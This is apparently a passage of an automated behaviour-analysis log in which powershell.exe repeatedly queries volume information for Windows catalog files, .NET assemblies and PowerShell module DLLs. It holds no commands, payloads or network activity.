    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
